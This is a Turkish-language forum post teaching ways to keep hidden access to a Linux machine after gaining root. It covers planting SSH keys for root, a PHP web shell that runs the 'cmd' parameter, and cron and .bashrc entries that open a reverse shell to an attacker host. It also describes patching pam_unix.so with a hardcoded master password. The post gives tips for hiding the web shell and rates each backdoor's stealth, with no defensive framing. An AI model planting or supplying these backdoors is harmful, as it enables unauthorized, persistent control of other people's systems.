MrSynox

Owner
owner
SSH Backdoors

Ssh Backdoors temelde ssh anahtarlarımızı bazı kullanıcıların home dizininde bırakmayı tercih eder.
Genellikle kullanıcı, en yüksek ayrıcalıklara sahip kullanıcı olduğu için root olur.

sh-keygen ile bir ssh anahtarı oluşturalım


1621694989034.png

Artık 2 anahtarımız var. 1 özel anahtar ve 1 genel anahtar, şimdi /root/.ssh adresine gidin ve genel anahtarı orada bırakın.
Genel anahtarı yeniden adlandırmayı unutma authorized_keys


Artık basitçe root olarak giriş yapabiliriz.

Not: Bu backdoor pek gizli sayılmaz. Yetkili kişi farkedecekdir.


PHP Backdoors

Bir Linux bilgisayarında kök erişimi elde ederseniz, büyük olasılıkla web root ve veya herhangi bir yararlı bilgiyi arayacaksınız.

Web root genellikle /var/www/html konumunda bulunur.

Kod:
<? php
if (isset ($ _ REQUEST ['cmd'])) {
echo "<pre>". shell_exec ($ _ REQUEST ['cmd']). "</pre>";
}
?>
Bu kod basitçe "cmd" parametresini alır ve o parametreye verilen her şeyi çalıştırır.

"$ _REQUEST ['cmd'])" kullandığımıza dikkat edin; bu, bu parametreyi GET veya POST verilerinde geçirebileceğiniz anlamına gelir.

Bunu gizlemek için bir kaç öneri

Mevcut bir php dosyasına ekleme yapabilirsiniz

"cmd" parametresini başka bir şeyile değiştirin


CronJob Backdoors
Cronjob nedir
Bilgisayar işletim sistemlerinde zamana dayalı bir iş planlayıcıdır. Yazılım ortamlarını kuran ve sürdüren kullanıcılar, işleri belirli zamanlarda, tarihlerde veya aralıklarla çalışmak üzere planlamak için cron kullanır.

/etc/cronjob Dosyalarına bakın



1621694996770.png


2 harfe dikkat edin: "m ve h"

Bunlar, görevin her saat mi yoksa dakikada bir mi çalıştırılması gerektiğini gösteren harflerdir.

"h" nin altında bir "*" sembolü olduğunu görebilirsiniz. Bu, aşağıdaki görevin her saat çalışacağı anlamına gelir.

Bunu cronjob dosyasına ekleyin

* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker/port 0>&1'

Belirttiğiniz portu dinlemeyi unutmayın


Not: Bu backdoor pek gizli sayılmaz. Yetkili kişi farkedecekdir.

.bashrc Backdoors

Bir kullanıcının oturum açma kabuğu olarak bash varsa, etkileşimli bir oturum başlatıldığında ana dizinindeki ".bashrc" dosyası çalıştırılır.

Dolayısıyla, sistemlerinde sık sık oturum açan herhangi bir kullanıcı tanıyorsanız, shellinizi ".bashrc" dosyalarına eklemek için bu komutu çalıştırabilirsiniz.


echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc

Kullanıcınızın ne zaman oturum açacağını bilmediğiniz için nc dinleyicinizin her zaman hazır olması gereklidir.

Not: bu backdoor gerçekden gizli diyebiliriz

pam_unix.so Backdoors
"Pam_unix.so" dosyasının ne olduğunu bilmiyorsanız, Linux'ta kimlik doğrulamadan sorumlu olan dosyalardan biridir.

1621695007547.png"pam_unix.so" dosyası, kullanıcının sağladığı şifreyi doğrulamak için "unix_verify_password" işlevini kullanır.


1621695012902.png
Eklediğimi gördünüzmü?
"if (strcmp (p," 0xMitsurugi ")! = 0)"


ekran görüntüsünde "p" değişkeni ile "0xMitsurugi" dizesini karşılaştırıyoruz.
"P" değişkeni, kullanıcının sağladığı şifreyi ifade eder.

ifadenin sonunda "! = 0" görebilirsiniz. Bu, "başarılı değilse" anlamına gelir.
Dolayısıyla, "p" değişkeni (kullanıcı tarafından sağlanan parola) ve "0xMitsurugi" dizesi aynı DEĞİLSE ... "unix_verify_password" işlevi kullanılacaktır.

"p" değişkeni (kullanıcı tarafından sağlanan parola) ve "0xMitsurugi" dizesi aynıysa, kimlik doğrulama başarılıdır. Başarıyı "PAM_SUCCESS" kullanarak işaretliyoruz

bu backdoor kendi şifrenizi "pam_unix.so" dosyasına eklemekten ibarettir.

Dosyaya eklediğiniz şifreyi bildiğiniz için, şifre "pam_unix.so" dan kaldırılana kadar bu şifreyle her zaman kimliğinizi doğrulayabilirsiniz.

Bu işlemi otomatik olarak yapıcak bir script bulunmaktadır.

 
Üst